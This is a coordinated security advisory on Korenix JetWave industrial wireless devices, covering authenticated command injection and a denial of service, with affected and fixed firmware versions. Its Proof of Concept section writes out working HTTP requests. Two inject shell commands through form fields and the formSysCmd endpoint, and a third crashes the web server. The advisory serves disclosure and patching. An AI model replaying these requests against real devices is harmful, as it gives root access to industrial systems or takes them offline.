Headline
Korenix JetWave Command Injection / Denial Of Service
Multiple versions of Korenix JetWave suffer from authenticated command injection and denial of service vulnerabilities.
CyberDanube Security Research 20230213-0------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| JetWave4221 HP-E, JetWave 2212G, JetWave 2212X/2212S, | JetWave 2211C, JetWave 2411/2111, JetWave 2411L/2111L, | JetWave 2414/2114, JetWave 2424, JetWave 2460, | JetWave 3220/3420 V3 vulnerable version| See "Vulnerable Versions" fixed version| See "Solution" CVE number| requested impact| High homepage| https://korenix.com/ found| 2022-11-28 by| S. Dietz, T. Weber (Office Vienna) | CyberDanube Security Research | Vienna | St. Pölten | | https://www.cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"Korenix Technology, a Beijer group company within the Industrial Communicationbusiness area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.[...]Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, andTransportation. Worldwidecustomer base covers different Sales channels, including end-customers, OEMs,system integrators, and brand label partners."Source:https://www.korenix.com/en/about/index.aspx?kind=3Vulnerable Versions:-------------------------------------------------------------------------------The following firmware versions have been found to be vulnerable byCyberDanube: * Korenix JetWave4221 HP-E <= V1.3.0 * Korenix JetWave 3220/3420 V3 < V1.7The following firmware versions have been identified to be vulnerable by thevendor: * Korenix JetWave 2212G V1.3.T * Korenix JetWave 2212X/2112S V1.3.0 * Korenix JetWave 2211C < V1.6 * Korenix JetWave 2411/2111 < V1.5 * Korenix JetWave 2411L/2111L < V1.6 * Korenix JetWave 2414/2114 < V1.4 * Korenix JetWave 2424 < V1.3 * Korenix JetWave 2460 < V1.6Vulnerability overview-------------------------------------------------------------------------------1) Authenticated Command InjectionThe web server of the device is prone to an authenticated command injection.It allows an attacker to gain full access to the underlying operating system ofthe device with all implications. If such a device is acting as key device inan industrial network, or controls various critical equipment via serial ports,more extensive damage in the corresponding network can be done by an attacker.2) Authenticated Denial of Web-ServiceWhen logged in, a user can issue a POST request such that the underlying binaryexits. The Web-Service becomes unavailable and cannot be accessed until thedevice gets rebooted.Proof of Concept-------------------------------------------------------------------------------1) Authenticated Command Injection1.a)The command "touch /tmp/poc" was injected to the system by using the followingPOST request:===============================================================================POST /goform/formTFTPLoadSave HTTP/1.1Host: 172.16.0.38User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 127Origin: http://172.16.0.38Connection: closeReferer: http://172.16.0.38/mgmtsaveconf.aspCookie: -common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45Upgrade-Insecure-Requests: 1submit-url=%2Fmgmtsaveconf.asp&ip_address=192.168.1.1&file_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp_action=load&tftp_config=Submit=============================================================================== The command gets executed as root and a file under the folder /tmp/ is created.1.b)The command "touch /tmp/poc2" was injected to the system by using the followingPOST request:===============================================================================POST /goform/formSysCmd HTTP/1.1Host: 172.16.0.38Content-Type: application/x-www-form-urlencodedConnection: closeReferer: 172.16.0.38Cookie: -common-web-session-=::webs.session::df1307d508d798638a8b4572987462bbContent-Length: 40sysCmd=touch%20/tmp/poc2&submit-url================================================================================The command gets executed as root and a file under the folder /tmp/ is created.Command output is written into /tmp/syscmd.2) Authenticated Denial of Web-ServiceThe process goahead chrashes when the following POST request is sent to theendpoint /goform/formDefault:===============================================================================POST /goform/formDefault HTTP/1.1Host: 172.16.0.38User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 62Origin: http://172.16.0.38Connection: closeReferer: http://172.16.0.38/toolping.aspCookie: -common-web-session-=::webs.session::3c624961199904f380e978a3967cc356Upgrade-Insecure-Requests: 1PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping=============================================================================== The output was observed on the terminal using our emulated instance:=============================================================================== rm: invalid option -- /BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binaryUsage: rm [OPTION]... FILE...Remove (unlink) the FILE(s). You may use '--' toindicate that all following arguments are non-options.Options: -i always prompt before removing each destination -f remove existing destinations, never prompt -r or -R remove the contents of directories recursivelykillall: wlwatchdog: no process killedkillall: wlapwatchdog: no process killed=============================================================================== The vulnerabilities were manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution-------------------------------------------------------------------------------Owner of these products are suggested to update to the following versions: * Korenix JetWave 4221 HP-E V1.4.0 * Korenix JetWave 2212G V1.10 * Korenix JetWave 2212X/2112S V1.11 * Korenix JetWave 2211C V1.6 * Korenix JetWave 2411/2111 V1.5 * Korenix JetWave 2411L/2111L V1.6 * Korenix JetWave 2414/2114 V1.4 * Korenix JetWave 2424 V1.3 * Korenix JetWave 2460 V1.6 * Korenix JetWave 3220/3420 V3 V1.7Recommendation-------------------------------------------------------------------------------CyberDanube recommends customers from Korenix to upgrade the firmware to thelatest version available. Furthermore, a full security review by professionalsis recommended.Contact Timeline-------------------------------------------------------------------------------2022-12-05: Contacting Beijer Electronics Group via [email protected]: Meeting with Beijer Electronics. Vulnerabilities were confirmed by the vendor. The vendor planned to fix the vulnerabilities in the next 1.5 months.2023-01-04: Contact shared the updated firmware version. CyberDanube checked if the vulnerabilities got fixed. The contact communicated that not only JetWave4221 is vulnerable to these issues. Therefore, CyberDanube postponed the release of the Advisory until the other products have been patched.2023-01-30: Meeting with Beijer Electronics. Customer get informed about the issues. Fixes got published. Disclosure date got shifted to 2023-02-13 to provide a time-window for patching.2023-02-13: Coordinated release of security advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF S. Dietz, T. Weber / @2023